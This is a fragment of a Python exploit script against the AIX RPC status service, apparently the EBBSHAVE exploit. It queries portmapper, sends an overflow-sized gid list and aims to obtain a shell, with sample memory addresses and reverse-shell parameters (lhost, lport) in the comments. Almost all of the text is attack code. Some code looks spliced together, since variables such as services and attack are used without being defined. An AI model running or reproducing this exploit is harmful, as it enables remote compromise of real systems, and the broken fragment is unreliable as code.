# Exploit code example; shellcode requires /usr/bin/bash on the target
# Example values for my AIX 7.2 LPAR:
# gid_base: 3007d390
# execl_func: d0307940
# execl_toc: f081bc20
# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
from os import urandom
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack, unpack
from sys import argv, exit
from time import time, sleep
def getCredLoopbackBody():
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
# Big enough to trigger an overflow
# Not big enough to trigger defensive code
# You could make this a little bit less,
# but you'd have to tweak the part 2 code
gids_len = pack('>I', 64)
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, 111)) # port 111 for portmapper
s.send(getPacket(getMessage(
100000, # portmapper
2, # version 2
4, # DUMP
False # unauth request
)))
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
if (prog_num == 100024 # status
and proto_num == 6): # TCP
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
services.append((prog_num, ver_num, port))
s.close()
# Try attacking
for service in services:
prog_num, ver_num, port = service
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, port))
resp_len = 0
s.send(getPacket(getMessage(
prog_num,
ver_num,
0, # NULL, acts like a ping
attack
)))
s.settimeout(5) # give inetd/... a chance to spin up the service if needed
try:
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
except:
resp_len = 0 # typically either timeout, connection error, or Ctrl+C
try:
s.close() # try closing the connection if it isn't already dead
except:
pass # connection is probably already dead
print '[ ] Got response length ' + str(resp_len)
if resp_len == 0: # suspect the service either timed out or crashed
if attack:
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
else:
print '[-] Service probably down or otherwise misbehaving, skipping...'
break